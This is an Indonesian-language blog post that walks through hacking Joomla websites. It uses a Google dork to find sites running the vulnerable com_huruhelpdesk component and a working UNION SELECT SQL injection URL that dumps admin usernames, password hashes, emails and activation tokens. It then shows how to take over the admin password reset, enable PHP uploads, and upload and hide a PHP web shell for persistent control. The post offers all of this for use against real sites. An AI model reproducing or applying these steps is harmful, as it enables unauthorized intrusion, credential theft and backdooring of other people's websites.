Wednesday, February 9, 2011

Tutorial Hacking With SQL Injection Pada Joomla

5:56 AM Blackmygo


ok langsung saja kita menuju step by step dalam pengerjaannya.

==========
[+] step 1
==========

Buka google.. ketik keyword :
Code:
"inurl:/index.php?option=com_huruhelpdesk\"

Atau silahkan ke sini untuk liat Exploitnya Databasenya : Exploit Database

Tes satu per satu
coba kita ambil yang ini :



==========
[+] step 2
==========

Pasang exploit..
/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat(username,0x3a,password,0x3a,email),5,6,7+from+jos_users--

Maka akan menghasilkan gambar seperti dibawah ini:



Nah kita akan melihat admin nya... :P

==========
[+] step 3
==========

Coba kita reset password nya :
/index.php?option=com_user&view=reset

hmmm... minta email dia.. masukin saja email admin tadi..

Then enter..

==========
[+] step 4
==========

Minta activation pula
hmm.. gimana ne?
tenang.. kita cari dulu activationnya :
Code:
/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat(username,0x3a,password,0x3a,email,0x3a,activation),5,6,7+from+jos_u​sers--



Tuh kan keluar activatifasinya
hehehe
:)
lanjut...

copas aja ke yang tadi.. enter.. :)

==========
[+] step 5
==========

copas aja ke yang tadi.. enter.. :)



==========
[+] step 6
==========

Hehehehe
Dia minta pasword baru tu.. kasih aja..



==========
[+] step 7
==========

OK langsung aja masuk ke admin nya..
http://[site]/[pacth]/administrator



==========
[+] step 8
==========

masuk ternyata.. heheh
sabar²..



nah.. di sini ente harus ubah dulu "Global configuration" nya
lalu setelah itu masuk ke "media manager"

==========
[+] step 9
==========

Nah.. kita ke global configuration terlebih dahulu...

Ubah media settingnya, tambahin aja extension PHP


jangan lupa di save..
:D

==========
[+] step 10
==========

OK
lanjut..
Buka media manager..

nah, ini tahap terakhir..



Silahkan Upload Shell php mu..
seep selesai..

Bila tidak ada tulisan berwarna merah berarti berhasil..

Maka Shell kita akan berada di sini :
http://[site]/[pacth]/images/namashell.php

OK sekarang terserah kalian.. mau diapain tu site..

saran saya.. kalo bisa..
upload aja lagi shell di directory yang lain..
lalu hapus shell yang di directory images tadi..

sekian aja dulu
Selamat mencoba.. :D

0 comments:

Post a Comment

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Radio Online